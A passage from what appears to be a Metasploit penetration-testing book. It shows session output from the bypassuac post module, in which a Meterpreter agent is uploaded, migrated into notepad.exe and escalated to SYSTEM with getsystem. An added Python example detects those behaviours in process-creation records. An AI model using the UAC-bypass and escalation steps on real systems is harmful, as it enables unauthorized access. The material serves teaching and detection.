

Chapter 16

[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 2 opened ( -> at Thu June 09 19:50:54 -0500 2011
[*] Session ID 2 ( -> processing InitialAutoRunScript 'migrate -f'
[*] Current server process: tYNpQMP.exe (3716)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3812
[*] New server process: notepad.exe (3812)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter >

We could also have executed  instead of  within the Meterpreter console, and it would have leveraged the default options and executed without having to set up the various options.

Notice in the preceding example that we succeed in gaining system-level rights on a target machine with UAC enabled. This small example demonstrates how the post exploitation modules will ultimately be set up and converted.

This script works simply by uploading a previously compiled executable to the target machine and then running it. Take a look at the post exploitation module for a better idea of what's going on behind the scenes:

root@bt:/opt/framework3/msf3# nano modules/post/windows/escalate/bypassuac.rb
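The session output above shows the two things a defender can key on: an executable with a generated name (tYNpQMP.exe) uploaded and run from somewhere a normal user can write to, and a notepad.exe host process spawned by that executable for the 'migrate -f' script to move into. The following is an added example, not code from the book or from the Metasploit project: it runs those two checks over constructed process-creation records. The field names loosely follow Sysmon event 1, and the file paths are assumptions; the PIDs and the payload name mirror the output above.

```python
import re
from collections import namedtuple

# One process-creation record (constructed; fields loosely follow Sysmon event 1).
Event = namedtuple("Event", "pid ppid image")

# Directories an unprivileged user can write to; an uploaded agent has to land somewhere like this.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData\\Local\\Temp|Users\\Public|Windows\\Temp)\\", re.I)

# The 'migrate -f' script in the output above spawns notepad.exe as its host process.
MIGRATION_HOSTS = {"notepad.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1]

def case_changes(s):
    """Count upper/lower transitions; generated names such as tYNpQMP have many."""
    return sum(1 for a, b in zip(s, s[1:]) if a.isupper() != b.isupper())

def looks_random(filename):
    """Heuristic for a generated .exe name: letters only, short, heavily mixed case."""
    stem, _, ext = filename.rpartition(".")
    return (ext.lower() == "exe" and stem.isalpha()
            and 5 <= len(stem) <= 10 and case_changes(stem) >= 3)

def find_suspicious(events):
    """Return (pid, reason) pairs for records matching the two behaviours shown on this page."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        if USER_WRITABLE.search(e.image) and looks_random(name):
            findings.append((e.pid, f"random-named executable {name} run from a user-writable directory"))
        if name.lower() in MIGRATION_HOSTS and parent and USER_WRITABLE.search(parent.image):
            findings.append((e.pid, f"{name} spawned by {basename(parent.image)} (possible migration host)"))
    return findings

# Constructed sample records; PIDs and payload name mirror the session output, paths are assumed.
SAMPLE_EVENTS = [
    Event(2280, 1900, r"C:\Windows\explorer.exe"),
    Event(3716, 2280, r"C:\Users\bob\AppData\Local\Temp\tYNpQMP.exe"),
    Event(3812, 3716, r"C:\Windows\System32\notepad.exe"),
    Event(4100, 2280, r"C:\Windows\System32\notepad.exe"),  # a user opening Notepad normally
]

if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(pid, reason)
```

The ordinary Notepad launch from explorer.exe (PID 4100) is not flagged; only the dropped executable and the notepad.exe it spawned are.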

Wrapping Up

We won't cover all the details of the post exploitation module because it is nearly identical to the attack shown in Chapter 13. Carefully walk through each line, and then try to build and run your own module.

Walk through existing Meterpreter scripts and look at the different commands, calls, and functions that can be used to create your own script. If you come up with a great idea for a new script, submit it to the Metasploit development team—who knows; it might be a script that others can use!